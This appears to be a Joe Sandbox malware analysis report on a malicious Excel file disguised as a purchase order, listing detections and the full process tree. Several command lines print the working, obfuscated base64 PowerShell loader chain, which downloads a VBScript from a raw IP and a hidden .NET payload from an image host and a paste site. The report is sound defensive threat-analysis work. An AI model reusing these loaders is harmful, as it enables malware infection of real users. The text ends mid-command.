Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NB PO-104105107108.xls

Overview

General Information

Sample name:NB PO-104105107108.xls
Analysis ID:1574858
MD5:ac8e858040a8cead91ef441f86c9cb40
SHA1:cfa17e7609799a0b1ecc49e2d542bc159af20f7a
SHA256:1272130e96664e18dfff89fc4e6017c3bbf17090f304df2b3a9c7f604b7ad54a
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected obfuscated html page
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3288 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3580 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3712 cmdline: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3736 cmdline: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3988 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 4032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • mshta.exe (PID: 2772 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3040 cmdline: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3068 cmdline: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2100 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2036 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 2648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven[1].htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 4032JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 4032INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2f62:$b2: ::FromBase64String(
      • 0x2fcd:$b2: ::FromBase64String(
      • 0x48e8:$b2: ::FromBase64String(
      • 0x557f:$b2: ::FromBase64String(
      • 0x2eacd:$b2: ::FromBase64String(
      • 0x47f0e:$b2: ::FromBase64String(
      • 0x4fd89:$b2: ::FromBase64String(
      • 0x687c1:$b2: ::FromBase64String(
      • 0x68f1e:$b2: ::FromBase64String(
      • 0x83e2a:$b2: ::FromBase64String(
      • 0x8469c:$b2: ::FromBase64String(
      • 0x84cb4:$b2: ::FromBase64String(
      • 0x2fac:$b3: ::UTF8.GetString(
      • 0x48c7:$b3: ::UTF8.GetString(
      • 0x555e:$b3: ::UTF8.GetString(
      • 0x2e908:$b3: ::UTF8.GetString(
      • 0x47eed:$b3: ::UTF8.GetString(
      • 0x4fd68:$b3: ::UTF8.GetString(
      • 0x687a0:$b3: ::UTF8.GetString(
      • 0x68efd:$b3: ::UTF8.GetString(
      • 0x83e09:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 2648JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 2648INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x826f:$b2: ::FromBase64String(
        • 0x89cd:$b2: ::FromBase64String(
        • 0x22e8c:$b2: ::FromBase64String(
        • 0x234a4:$b2: ::FromBase64String(
        • 0x2404a:$b2: ::FromBase64String(
        • 0x2bafa:$b2: ::FromBase64String(
        • 0x2f8dc:$b2: ::FromBase64String(
        • 0x2f948:$b2: ::FromBase64String(
        • 0x30e26:$b2: ::FromBase64String(
        • 0x31440:$b2: ::FromBase64String(
        • 0x320d1:$b2: ::FromBase64String(
        • 0x37f15:$b2: ::FromBase64String(
        • 0x824e:$b3: ::UTF8.GetString(
        • 0x89ac:$b3: ::UTF8.GetString(
        • 0x22e6b:$b3: ::UTF8.GetString(
        • 0x23483:$b3: ::UTF8.GetString(
        • 0x24029:$b3: ::UTF8.GetString(
        • 0x2bad9:$b3: ::UTF8.GetString(
        • 0x2f927:$b3: ::UTF8.GetString(
        • 0x30e05:$b3: ::UTF8.GetString(
        • 0x3141f:$b3: ::UTF8.GetString(

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5z